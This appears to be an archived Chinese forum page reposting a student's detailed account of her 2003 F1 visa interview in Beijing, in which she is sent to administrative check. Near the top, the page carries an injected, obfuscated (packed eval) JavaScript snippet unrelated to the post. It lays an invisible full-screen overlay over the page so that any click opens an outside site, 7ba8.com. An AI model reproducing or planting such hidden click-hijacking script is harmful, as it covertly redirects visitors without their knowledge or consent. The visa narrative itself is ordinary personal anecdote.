标题: 5月28日北京F1一签被check(转) [打印本页] 作者: lemon_peel 时间: 2003-5-29 15:35 标题: 5月28日北京F1一签被check(转) <script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>标题:528我mm的check经历(转自BBS 水木清华站)
发信人: ebayer (pink), 信区: Visa
标 题: 528我mm的check经历
发信站: BBS 水木清华站 (Wed May 28 16:36:09 2003), 转信
sigh,完全没有被check的心理准备嘛,毕竟无机化学也不是敏感专业.郁闷!昨天才开始准备签证,呵呵,我倒是觉得其实也不用准备很久啦,虽然之前很害怕。一天差不多了。今天早上爬起来忽然想起来没有打印research experience,于是跑去打印了一番,结果就和xiaoyue去得比较晚.我们快十点才进去,然后排队啊,累死了.我被分到一个小帅哥那里,不知道是不是大家说的美男. 问的时间还挺长,大约20min,趁我还记得,把所有问题都写出来吧!
v:how are you
v:so you will go to America to study?
v:wa,upenn is a good university
m:smile,thank u
v:you are from pku?
m:yes, I am an undergraduate student there.
v:when will you graduate?
v:then you will go to America in June?
m:yes, I will graduate early than other students, because I am very excellent and I will be able to arrange my presentation of the final thesis in advance……大约这样子,鬼想到他会问这个问题啊,乱说,也不知道表达对不对,哈哈总之说我很厉害,所以提前答辩。
v:ok, you are studying…
m:chemistry, inorganic chemsitry.
v:what is your major?
m:solid-state chemistry.
m:yes, solid-state chemistry, this area has a lot of applications and it has a huge and potional market in China. Besides, this area in Upenn is the best in the world! You must know, Pro. Macdaimd has just got the Nobel Laureate in 2000,and he does research in this area. I hope to do my research with him in the future so that I can get the best training in this area.
v:No, I do not know, I know nothing about chemistry.(猪头,难怪后来check我,无机也check,郁闷啊)
m:smile, now I told you know, and you know it.
V:smile. ok, what is your plan after graduation?
m:Well, I want to be a leader of a research group. I do not want to do common research work and end my life like that.(临时加的,比较搞笑,vo听了说,wao)So I will come back and search for a position in some chemical company and make my dream come true.
v:some chemical company,for example?
m:There are lots of such companies, such as Beijing Shan-huan High-tech com.and the P&G com. will be very good choice for me.
v:The P&G com.?I know it also company in Amirica, why do not you work there?
m:As I said before, I want to be a leader, in America, this area has already been well developed and what I can do there is to follow other's instructions. But in china, this area has just been started to be studied. If I come back, with the knowledge I studied in America, I will be an expert in this area and I wil l be able to be a leader, to have my own ideas and to do the things I like and to see them come true. Also, this is very feasible.
m:yes, you know I can get the best training and beside this, I am very clever and very excellent……(恶心,呵呵),there is no doubt I can find such a position.
v:so you mean that even if you can get very high salary in Amirica, you will still come back to china?
m:眼看大约不能不回答了,definitely I will come back, because in China I have better opportunities for my future career, I told you the reason just now. Besides, I want to be with my families and make them to live better-off…,还想说,被打断
v:Then you can work in America and mail the money back to them.
m:做不屑状,money is not everything, to make my parents live better-off dose not only means give money to them, but I want to share my life with them and to show them my love, to make them happy everyday, for example, I can enjoy all the festivals with them and make them be proud of me……
m:说了一句很搞笑的话。You can look into my eyes and you will know it is really,I hope you can believe in me.
v:smile,看了我一会儿。去电脑上敲敲打打了。give me your t&g scores
m:here u r
m:do you want to see me resume and my research experience?
m:would you like to see my offer letter?
m:没事干,翻了翻我的材料,看见我下载的一些公司网页,觉得不show一下浪费了,就隔着玻璃只给他看,this is the webpage of the P&G com, you see, this guy works in the R&D department, and his research area is very similar to me. 我当时用绿色的笔把那一段圈出来了,还在旁边画了一个很大的笑脸,vo看了就笑了一下。So the chance in China is very good for me.
v:停止敲字,笑着跟我说,yes, your area have very good application and I beleive your plan,听得我真是狂喜啊,木有想到他接着说,but we will send your materials to washington……
我听到那个but心就开始往下沉,想,这样也能据我?不是吧!然后明白不是被拒,大约是check了,我就开始激动了,前面我说话慢慢的,还打打手势,说一下笑一下的,这下急了。冲着他大叫:you mean I will be checked?
v:yes, you have to wait for about 4 weeks……
m:绝望的,no!you can not check me! Inorganic chemistry does not belong to the 敏感专业,结果不会说,情急之下说了个AI list,哈哈,也不知老外懂不懂。I am just doing the theory research……
m:看见他盖了章就绝望了,闭嘴不说了。我当时大约很不高兴,连thank you all the same 都不想说,呱叽呱叽收拾材料去了。 后来下去看见xiaoyue,呵呵,xiaoyue还以为我被据了。 xiaoyue是接着我的,据说她就比较搞笑了,一上来vo就问她和我是不是classmates,然后单刀直入的问plan,xiaoyue说她都觉得不可思议。呵呵,最后说,她的命运将和她的classmate一样,也就是偶啦。惨啊!大概如此,我的记忆力还是不错的,hiahia,后来出来被好多人围着问,比较壮观。我还稀里糊涂的想把一个214b表给一个gg/dd?,呵呵。因为看见有人在网上问过那个表那里有的看,我还以为他想看:)。结果他赶紧不要,我才发现大约是触霉头的事情,我真是土啊!希望那个gg/dd好运!
good luck to everyone!